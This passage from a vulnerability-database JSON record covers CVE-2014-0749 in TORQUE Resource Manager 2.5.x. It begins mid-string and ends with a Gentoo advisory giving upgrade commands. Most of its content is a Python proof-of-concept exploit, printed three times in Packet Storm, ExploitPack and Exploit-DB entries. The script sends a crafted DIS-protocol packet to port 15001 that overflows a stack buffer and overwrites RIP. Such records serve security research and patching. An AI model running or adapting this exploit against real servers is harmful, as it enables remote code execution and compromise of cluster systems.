The result of this exploit is intended to just point RIP at 'exit()' \n \nimport socket \n \n \nip = \"172.16.246.177\" \nport = 15001 \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((ip, port)) \n \noffset = 143 \nheader = str(len(str(offset))) + str(offset) + '1' \n \npacket = header \npacket += \"\\x00\" * (140 - len(packet)) \npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build \n \ns.sendall(packet) \ndata = s.recv(1024) \ns.close() \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126855/torquerm-overflow.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:50", "description": "\nTORQUE Resource Manager 2.5.x 2.5.13 - Stack Buffer Overflow Stub", "cvss3": {}, "published": "2014-05-28T00:00:00", "type": "exploitpack", "title": "TORQUE Resource Manager 2.5.x 2.5.13 - Stack Buffer Overflow Stub", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-28T00:00:00", "id": "EXPLOITPACK:8FB219FFE4B8AEECDED9BDABBBAC76ED", "href": "", "sourceData": "#!/usr/bin/env python\n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub\n# Date: 27 May 2014\n# Exploit Author: bwall - @botnet_hunter\n# Vulnerability discovered by: MWR Labs\n# CVE: CVE-2014-0749\n# Vendor Homepage: http://www.adaptivecomputing.com/\n# Software Link: 
http://www.adaptivecomputing.com/support/download-center/torque-download/\n# Version: 2.5.13\n# Tested on: Manjaro x64\n# Description:\n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that\n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the\n# data, the next digits are the actual size of the buffer.\n#\n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system\n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be\n# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'\n\nimport socket\n\n\nip = \"172.16.246.177\"\nport = 15001\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((ip, port))\n\noffset = 143\nheader = str(len(str(offset))) + str(offset) + '1'\n\npacket = header\npacket += \"\\x00\" * (140 - len(packet))\npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build\n\ns.sendall(packet)\ndata = s.recv(1024)\ns.close()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-06-22T02:54:34", "description": "", "cvss3": {}, "published": "2014-05-28T00:00:00", "type": "exploitdb", "title": "TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["2014-0749", "CVE-2014-0749"], "modified": "2014-05-28T00:00:00", "id": "EDB-ID:33554", "href": "https://www.exploit-db.com/exploits/33554", "sourceData": "#!/usr/bin/env python\n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub\n# Date: 27 May 2014\n# Exploit Author: bwall - @botnet_hunter\n# Vulnerability discovered by: MWR Labs\n# CVE: CVE-2014-0749\n# Vendor Homepage: http://www.adaptivecomputing.com/\n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/\n# Version: 2.5.13\n# Tested on: Manjaro x64\n# Description:\n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that\n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the\n# data, the next digits are the actual size of the buffer.\n#\n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system\n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be\n# compiled on the target system. 
The result of this exploit is intended to just point RIP at 'exit()'\n\nimport socket\n\n\nip = \"172.16.246.177\"\nport = 15001\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((ip, port))\n\noffset = 143\nheader = str(len(str(offset))) + str(offset) + '1'\n\npacket = header\npacket += \"\\x00\" * (140 - len(packet))\npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build\n\ns.sendall(packet)\ndata = s.recv(1024)\ns.close()", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/remote/33554.py", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-09-25T17:23:54", "description": "### Background\n\nTORQUE is a resource manager and queuing system based on OpenPBS.\n\n### Description\n\nMultiple vulnerabilities have been discovered in TORQUE Resource Manager. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll TORQUE Resource Manager 4.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-cluster/torque-4.1.7\"\n \n\nAll TORQUE Resource Manager 2.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-cluster/torque-2.5.13\"\n \n\nNOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. 
It is likely that your system is already no longer affected by them.", "cvss3": {}, "published": "2014-12-26T00:00:00", "type": "gentoo", "title": "TORQUE Resource Manager: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2193", "CVE-2011-2907", "CVE-2011-4925", "CVE-2013-4319", "CVE-2013-4495", "CVE-2014-0749"], "modified": "2014-12-26T00:00:00", "id": "GLSA-201412-47", "href": "https://security.gentoo.org/glsa/201412-47", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
